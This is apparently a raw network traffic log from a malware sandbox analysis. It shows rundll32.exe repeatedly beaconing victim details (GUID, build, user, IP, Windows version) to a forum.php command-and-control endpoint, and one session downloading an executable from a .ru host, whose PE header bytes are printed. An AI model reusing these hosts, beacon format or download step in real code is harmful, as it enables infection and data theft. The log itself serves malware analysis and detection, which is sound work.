                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              13192.168.2.34973377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:28.082223892 CEST683OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:28.151757956 CEST683INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:29 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 51 4a 51 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cQJQJARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              14192.168.2.34973477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:29.094592094 CEST686OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:29.162270069 CEST686INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:30 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 42 48 53 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cBHSYARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              15192.168.2.34973577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:30.061108112 CEST687OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:30.127890110 CEST687INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:31 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 48 46 55 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cHFUSARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              16192.168.2.34973677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:30.953383923 CEST688OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:31.021161079 CEST688INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:32 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 59 5a 41 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cYZABARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              17192.168.2.34973777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:31.867690086 CEST689OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:31.935698032 CEST689INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:33 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 56 4e 4d 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cVNMEARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              18192.168.2.34973877.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:32.824184895 CEST690OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:32.892543077 CEST690INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:34 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4e 4d 4e 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cNMNMARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              19192.168.2.34973977.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:33.724469900 CEST691OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:33.792649984 CEST692INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:35 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4b 5a 41 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cKZAPARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              2192.168.2.3497208.211.241.080C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:14.898063898 CEST363OUTGET /7hfjsdfjks.exe HTTP/1.1
                              Accept: */*
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: srand04rf.ru
                              Cache-Control: no-cache
                              Jul 9, 2021 03:11:15.057348013 CEST364INHTTP/1.1 200 OK
                              Server: nginx
                              Date: Fri, 09 Jul 2021 01:11:14 GMT
                              Content-Type: application/octet-stream
                              Content-Length: 272910
                              Connection: keep-alive
                              Last-Modified: Wed, 09 Jun 2021 16:00:40 GMT
                              ETag: "60c0e5a8-42a0e"
                              Accept-Ranges: bytes
                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 00 00 00 00 00 2a 04 00 00 00 00 00 e0 00 2f 03 0b 01 02 1e 00 50 03 00 00 26 04 00 00 06 00 00 80 14 00 00 00 10 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 80 04 00 00 04 00 00 81 81 04 00 02 00 00 01 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 50 04 00 a4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 64 9b 03 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b4 52 04 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 4f 03 00 00 10 00 00 00 50 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 38 00 00 00 00 60 03 00 00 02 00 00 00 54 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 c0 2e 72 64 61 74 61 00 00 a8 2d 00 00 00 70 03 00 00 2e 00 00 00 56 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 40 2f 34 00 00 00 00 00 00 14 90 00 00 00 a0 03 00 00 92 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 62 73 73 00 00 00 00 40 04 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 69 64 61 74 61 00 00 a4 0e 00 00 00 50 04 00 00 10 00 00 00 16 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 38 00 00 00 00 60 04 00 00 02 00 00 00 26 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 08 00 00 00 00 70 04 00 00 02 00 00 00 28 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f3 c3 8d b4 26 00 00 00 00 8d bc 27 00 00 00 00 83 ec 1c 31 c0 66 81 3d 00 00 40 00 4d 5a c7 05 ec 43 44 00 01 00 00 00 c7 05 e8 43 44 00 01 00 00 00 c7 05 e4 43 44 00 01 00 00 00 c7 05 80
                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL*/P&`@ PdR.textDOP`P`.data8`T@@.rdata-p.V@@@/4@0@.bss@@`.idataP@0.CRT8`&@0.tlsp(@0&'1f=@MZCDCDCD


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              20192.168.2.34974077.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:34.642386913 CEST692OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:34.710644007 CEST693INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:36 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4a 4a 51 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cJJQQARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              21192.168.2.34974177.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:41.325825930 CEST694OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:41.393680096 CEST695INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:42 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 41 43 58 5a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cACXZARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              22192.168.2.34974277.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:42.363435030 CEST695OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:42.432069063 CEST696INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:44 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 48 54 47 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cHTGSARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              23192.168.2.34974377.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:43.297147036 CEST702OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:43.364032030 CEST703INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:44 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 56 54 47 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cVTGEARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              24192.168.2.34974477.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:44.273397923 CEST704OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:44.340374947 CEST704INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:45 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 56 56 45 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cVVEEARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              25192.168.2.34974577.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:45.217994928 CEST705OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:45.287050962 CEST705INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:46 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4d 46 55 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cMFUNARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              26192.168.2.34974677.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:46.014456987 CEST708OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
                              Data Raw: 47 55 49 44 3d 31 32 34 35 38 31 34 33 35 35 30 32 30 34 30 31 35 38 35 32 26 42 55 49 4c 44 3d 30 37 30 37 5f 77 76 63 72 26 49 4e 46 4f 3d 37 38 33 38 37 35 20 40 20 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 5c 68 61 72 64 7a 26 45 58 54 3d 26 49 50 3d 31 38 35 2e 31 38 39 2e 31 35 30 2e 37 30 26 54 59 50 45 3d 31 26 57 49 4e 3d 31 30 2e 30 28 78 36 34 29
                              Data Ascii: GUID=12458143550204015852&BUILD=0707_wvcr&INFO=783875 @ computer\user&EXT=&IP=185.189.150.70&TYPE=1&WIN=10.0(x64)
                              Jul 9, 2021 03:11:46.081744909 CEST708INHTTP/1.1 200 OK
                              Server: nginx/1.20.1
                              Date: Fri, 09 Jul 2021 01:11:47 GMT
                              Content-Type: text/html
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              X-Powered-By: PHP/5.4.45
                              Data Raw: 63 0d 0a 4e 43 58 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: cNCXMARRABw==0


                              Session IDSource IPSource PortDestination IPDestination PortProcess
                              27192.168.2.34974777.222.42.6780C:\Windows\SysWOW64\rundll32.exe
                              TimestampkBytes transferredDirectionData
                              Jul 9, 2021 03:11:47.001276970 CEST709OUTPOST /8/forum.php HTTP/1.1
                              Accept: */*
                              Content-Type: application/x-www-form-urlencoded
                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                              Host: sudepallon.com
                              Content-Length: 121
                              Cache-Control: no-cache
